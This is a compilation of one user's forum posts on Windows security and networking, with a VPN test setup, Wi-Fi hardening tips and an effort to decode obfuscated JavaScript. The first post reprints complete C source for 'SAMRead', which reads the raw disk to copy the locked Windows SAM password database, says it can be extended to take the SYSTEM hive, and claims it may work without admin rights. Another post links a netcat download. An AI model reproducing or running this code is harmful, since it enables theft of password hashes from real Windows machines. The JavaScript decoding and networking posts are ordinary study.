Iain

I guess if someone has an XP SP3 fully patched PC, they could try it. The last time that I played around was well before SP3. Now, if it could be changed to WRITE directly to anywhere on the disc, that could be very dangerous ... (yes, I suppose that writing to the disc isn't all that hard, but what about the File Table entry and setting the file permissions etc.?). Edit: as a matter of interest, I'm fairly sure that the same poster on Rohitab produced code to copy any file using the same technique. I recall that user interaction was as the executable was run, rather than having to modify the code then recompile it. That made it much more user friendly. I don't know if it's been tried on Vista.

Here's the code: /* SAMRead - by Napalm @ NetCore2K ------------------------------- Please try and read and understand this source code. You will learn somthing. Sector = 512 Bytes of disk space Cluster = A Group of Sectors. This is different depending on your file system. But normally its 4Kb so thats 8 sectors. VCN = Virtual Cluster Number. Simply the index of the cluster within its context. LCN = Logical Cluster Number. The physical cluster index on containing media. Extent = The extent of a Cluster index. The DirectCopy function invokes a Device Control Code to get the cluster information about a file. We then loop though each resulting extent and copy each cluster to a new file. */ #define _WIN32_WINNT 0x0500 #include <windows.h> #include <winioctl.h> BOOL DirectCopy(LPSTR lpszSrc, LPSTR lpszDest) { BOOL bResult = FALSE; HANDLE hSrc = CreateFile(lpszSrc, FILE_READ_ATTRIBUTES, (FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE), NULL, OPEN_EXISTING, 0, 0); if(hSrc != INVALID_HANDLE_VALUE){ CHAR szDrive[7]; wsprintf(szDrive, "%c:", *lpszSrc); DWORD dwSectorPerCluster, dwBytesPerSector; GetDiskFreeSpace(szDrive, &dwSectorPerCluster, &dwBytesPerSector, NULL, NULL); DWORD dwClusterSize = (dwBytesPerSector * dwSectorPerCluster); LARGE_INTEGER liFileSize; liFileSize.LowPart = GetFileSize(hSrc, (LPDWORD)&liFileSize.HighPart); DWORD dwClusters = (liFileSize.QuadPart / dwClusterSize); DWORD dwRead, dwWritten, dwPointsSize = sizeof(RETRIEVAL_POINTERS_BUFFER) + (dwClusters * (sizeof(LARGE_INTEGER) * 2)); PRETRIEVAL_POINTERS_BUFFER pPoints = (PRETRIEVAL_POINTERS_BUFFER) new BYTE[dwPointsSize]; STARTING_VCN_INPUT_BUFFER vcnStart = { 0 }; if(DeviceIoControl(hSrc, FSCTL_GET_RETRIEVAL_POINTERS, &vcnStart, sizeof(vcnStart), pPoints, dwPointsSize, &dwWritten, NULL)){ wsprintf(szDrive, "\\\\.\\%c:", *lpszSrc); HANDLE hDrive = CreateFile(szDrive, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, 0); if(hDrive != INVALID_HANDLE_VALUE){ HANDLE hDest = CreateFile(lpszDest, GENERIC_WRITE, 0, NULL, CREATE_NEW, 0, 0); if(hDest != INVALID_HANDLE_VALUE){ SetFilePointer(hDest, liFileSize.LowPart, &liFileSize.HighPart, FILE_BEGIN); SetEndOfFile(hDest); LPBYTE lpCluster = new BYTE[dwClusterSize]; LARGE_INTEGER vcnPrev = pPoints->StartingVcn; for(DWORD dwExtent = 0; dwExtent < pPoints->ExtentCount; dwExtent++){ DWORD dwLength = (DWORD)(pPoints->Extents[dwExtent].NextVcn.QuadPart - vcnPrev.QuadPart); LARGE_INTEGER liSrcPos = { (pPoints->Extents[dwExtent].Lcn.QuadPart * dwClusterSize) }; LARGE_INTEGER liDstPos = { (vcnPrev.QuadPart * dwClusterSize) }; for(DWORD dwCluster = 0; dwCluster < dwLength; dwCluster++){ SetFilePointer(hDrive, liSrcPos.LowPart, &liSrcPos.HighPart, FILE_BEGIN); ReadFile(hDrive, lpCluster, dwClusterSize, &dwRead, NULL); SetFilePointer(hDest, liDstPos.LowPart, &liDstPos.HighPart, FILE_BEGIN); WriteFile(hDest, lpCluster, dwRead, &dwWritten, NULL); liSrcPos.QuadPart += dwClusterSize; liDstPos.QuadPart += dwClusterSize; } vcnPrev = pPoints->Extents[dwExtent].NextVcn; } delete lpCluster; CloseHandle(hDest); bResult = TRUE; } CloseHandle(hDrive); } } delete pPoints; CloseHandle(hSrc); } return bResult; } int main(int argc, char *argv[]) { CHAR szSAMFile[MAX_PATH + 12]; GetSystemDirectory(szSAMFile, MAX_PATH); lstrcat(szSAMFile, "\\config\\SAM"); return DirectCopy(szSAMFile, ".\\SAM.dat"); } from http://www.rohitab.com/discuss/index.php?s...&hl=samread There's a compiled executable there too. The code can be changed to grab the system file too. I read a couple of comments on the same group that the SAM and system files can be retrieved whether logged in with admin rights or not. I've not tried it though.

I'm fairly sure that the SAM file can be obtained without admin access. I'm not entirely familiar with the programming, but the file is obtained by accessing the drive directly rather than via the File Table. The location of the file is obtained and the drive accessed directly. I'll see if I can find the details if anyone's interested.

I, too, spotted that the site's down. I noticed a few months ago. Fortunately, I came across this ---> hxxp://www.securityforest.com/downloads/nc.exe

It's been flaky for me over the weekend but I managed to get the other function: function First(key,pt){ s=new Array(); for(var i=0;i&lt;256;i++) { s[i]=i; } var j=0; var x; for(i=0;i&lt;256;i++) { j=(j+s[i]+key.charCodeAt(i%key.length))%256;x=s[i]; s[i]=s[j]; s[j]=x; } i=0; j=0; var ct = ''; for(var y=0;y&lt;pt.length;y++) { i=(i+1)%256; j=(j+s[i])%256; x=s[i]; s[i]=s[j]; s[j]=x; ct+=String.fromCharCode(pt.charCodeAt(y)^s[(s[i]+s[j])%256]); } return ct; }; I think it's some form of encrypting/decrypting code. As I said in my forst post, the "nitty gritty" is: document.write(FunctionOne(FunctionTwo(<Random Array of Letters and Numbers>)). I've been researching the other function and it seems that atob() isn't available in IE (only Netscape, but I might be wrong). As far as I can tell, atob() relates to decoding Base64 ... but what about the remainder of that function and the other one that I've posted? I hope there are some JavaScript experts who can halp me to solve this. EDIT: I just found something very similar here ---> http://www.pastebin.sk/en/6588/

Check this - http://www.castlecops.com/p1099532-Sick_hospital.html I realise that this is some form of encryption (possibly AES). I've tried changing document.write( ... ) to alert ( ... ) but nada. As far as I'm aware, there's no easy way of printing the output of the code to a text file for future analysis/research. Any more tips to decode the encoded "garbage"?

Yes thanks, I'd seen that diary. I'm afraid I'm getting nowhere fast. I've tried using the script debugger that's with Office 2003 but I can't step through the code. If only I could find a way to step through it as I have done with Office VBA macros :-(

The site is down now. Here's the second function. I've tidied it up in Notepad - sorry there are no indents! EDIT: I've searched for some of the strings in the code and came up with http://www.castlecops.com/p1099532-Sick_hospital.html which has obfuscated JavaScript. It, too, has a whole load of "garbage" and I'm interested to know how it was decoded. function Second(data) { data=data.replace(/[^a-z0-9\+\/=]/ig,''); if(typeof(atob)=='function')return atob(data); var b64_map='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var byte1,byte2,byte3; var ch1,ch2,ch3,ch4; var result=new Array(); var j=0; while((data.length%4)!=0) { data+='='; } for(var i=0;i&lt;data.length;i+=4) { ch1=b64_map.indexOf(data.charAt(i)); ch2=b64_map.indexOf(data.charAt(i+1)); ch3=b64_map.indexOf(data.charAt(i+2)); ch4=b64_map.indexOf(data.charAt(i+3)); byte1=(ch1&lt;&lt;2)|(ch2&gt;&gt;4); byte2=((ch2&amp;15)&lt;&lt;4)|(ch3&gt;&gt;2); byte3=((ch3&amp;3)&lt;&lt;6)|ch4; result[j++]=String.fromCharCode(byte1); if(ch3!=64)result[j++]=String.fromCharCode(byte2); if(ch4!=64)result[j++]=String.fromCharCode(byte3); } return result.join(''); }; I realise that it's taking the enormous length of "gobbledegook" as <data> and it goes through a replacement process. That's what I don't understand (atob etc.) so I'd like to be able to step through the code (and also the first function) to see exactly how it's working.

I came across some obfuscated JavaScript and I'd like to understand what it does. Basically, there are two functions and the "nitty gritty" is: document.write(FunctionOne(FunctionTwo(<Random Array of Letters and Numbers>)) It seems that FunctionOne and FunctionTwo take the <Random Array of Letters and Numbers> and decode it, or map it in a predefined manner, before passing it to document.write. QUESTION: I'm familar with VBA in MS Word, Excel etc. and I have a little experience of C++. What's the best way of stepping through the JavaScript (in a controlled manner) to see what happens as the two functions are executed? I know that this is possible (and also set Break Points) in VBA in the MS applications so that's what I'd like to do with the JavaScript. I know there are utilities which will de-obfuscate JavaScript but that's not the issue - I want to know what these complicated functions do to the enormous string of letters and numbers.

Yes, I said it was a hurdle and I agree that it can be overcome easily. I said to use static IP addresses which implies disabling DHCP. Again, I appreciate that it can be circumvented. Agreed. If there's anything that can be done to prevent intrusion, I'd say do it. For instance, I'd disable SSID broadcast and change the encryption password frequently too. I know very well that this means nothing to a determined intruder but these simple configurations (along with WPA2) will dissuade a casual "ordinary" Windows user.

Apply MAC address filtering and use static IP addresses. I'd also be inclined to use an unusual private address range and subnet mask (such as 172.23.10.80/28, rather than the commonly used 192.168.0.0/24). MAC address filtering can be bypassed but it's another hurdle for him to get over.

Maybe the admin's set it up like this to lure someone into doing something dodgy ... ?

Of course, Tortilla may just have started the threads simply to "press our buttons" and get the responses that we've all given.

I think that someone involved with white hat activity would be more likely to use terms like "penetration testing" or "gain access" rather than "I'm trying to 'hack' a network".

OK - I *think* I'm getting somewhere: From the PC that's initiating the VPN (and accessing the remote share): Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel(R) PRO/100 VE Network Connection Physical Address. . . . . . . . . : 08-08-64-EF-D3-18 Dhcp Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 192.168.0.1 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : PPP adapter Testing: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : WAN (PPP/SLIP) Interface Physical Address. . . . . . . . . : 00-53-45-00-00-00 Dhcp Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 169.254.197.169 Subnet Mask . . . . . . . . . . . : 255.255.255.255 Default Gateway . . . . . . . . . : 169.254.197.169 and from the PC which accepts the incoming VPN and has the shared folder: Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : D-Link DFE-530TX PCI Fast Ethernet Adapter (rev.A) Physical Address. . . . . . . . . : 70-35-41-A2-4A-18 Dhcp Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 192.168.0.2 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : PPP adapter RAS Server (Dial In) Interface: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Internal RAS Server interface for dial in clients Dhcp Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 169.254.207.149 Subnet Mask . . . . . . . . . . . : 255.255.255.255 Default Gateway . . . . . . . . . : I realise now that when I connect the VPN, two additional interfaces are created and they have APIPA. I started Wireshark (with the VPN connected), collected data from 192.168.0.1 and there was a lot of traffic - including plain text name of the file that I retrieved. I restarted Wireshark and collected data from 169.254.197.169 and there were 4 frames. None of them related to the file that I retrieved. Needless to say, the Wireshark is running on the PC which has 192.168.0.1 as it's IP address. I've learned something - that additional "virtual" interfaces are created when the VPN is connected - but why does the majority of my traffic go through the real interfaces rather then the "virtual" ones?

But when I've been through the VPN connection dialogue (entering the Admin name and Password), I get the message in the System Tray which says that the VPN is connected. There are only two addresses available to me - 192.168.0.1/24 and 192.168.0.2/24 and the latter has both the shared folder as well as the incoming VPN connection. I'm confused! :(

Thank you for the suggestion. I wondered if there was some way to do it other than collecting and reviewing network traffic. I didn't know if there was a configuration about which I was unaware.

Goodness - I can't think for a minute that you typed all of those in! Did you get the list from your system (if so, how did you get the details?) or did you get it from a website? Just going from my problem (Run as... for Network Connections), I was aware of Start>Run>runas /user:AdministratorAccountName ncpa.cpl but that doesn't launch Network Connections.

Open Control Panel normally then Shift-Right Click the applet. It'll give you the option to Run as... Interestingly enough, I do exactly the same ... for security. I've not found a way to open Network Connections though via this technique. I've done a fair amount of searching but dont think it can be done. I've resorted to logging off and logging back on or kill explorer.exe then relaunch it as Admin. HTH

Thanks for the quick response, but I'm not sure what you mean. The XP Pro PCs are linked by a cross-over cable. One is 192.168.0.1/24 and the other is 192.168.0.2/24. The latter has the shared folder (and also set up as the VPN to allow incoming connections) so I can access the shared folder from the first PC using Start>Run>192.168.0.2SharedFolder. If I open the VPN connection between the two PCs and then issue the same Start>Run command, how can I be sure that any information passes along the secure VPN connection (yes, I know it's a REAL PN, rather than a VIRTUAL PN). My ultimate goal is to know how to be sure that data is encrypted when I start to configure PPTP/L2TP & IPSec. @SomeoneE1se - quite correct. It's just for testing and learning purposes at present.

I've been experimenting with VPN between 2 XP Pro PCs connected via a cross-over cable. I created and shared a folder on one PC which I was able to access from the other via Start>Run>IP AddressShareName. I created a VPN connection (with the PC having the shared folder being able to receive incoming connections) and managed to connect the two PCs satisfactorily. The question that I have is regarding accessing the shared folder from the remote PC. If I connect the PCs via the VPN and then access the shared folder (via Start>Run, as before), how can I be sure that any communication between the PCs (i.e. retrieving files from or placing files into the shared folder) occurs throught the VPN connection rather than simply via the same route that was used prior to using the VPN connection? I just want to get this straight in my head before I start to look at what happens if I try to VPN within a domain and look into IPSec etc. Thanks for your time (and patience!).

He started TS, not Telnet. Agreed about the security. How about disabling .bat files too - one which reverses one.bat and another which reverses two.bat? I suppose the ultimate would be to combine one.bat, two.bat, three.bat and four.bat into one jumbo batch file with a 4-options menu, one option starting each of the relevant sections. NB - whilst Windows Firewall was considered, there's the problem of configuring Port Forwarding through an ADSL router. It's easy for those who are tech-savvy but not for those who "dont know a dam thing". [sic]

@operat0r_001 Have you thought about using a Thumb Drive with a write protect switch? I know they are difficult to find. I have a fear of putting mine into a PC to have files modified by something on the PC. Sure, I know that I can restore the Thumb Drive from my clean copies of the utilities on my own PC, but I'd prefer to avoid having to do that.

@FearFactory - If you manage to get anywhere with this, can you post your progress please? I'm sure that it will be of interest to others.

I don't think it's possible to get ONLY Recovery Console. Have a look here (almost at the bottom) and here.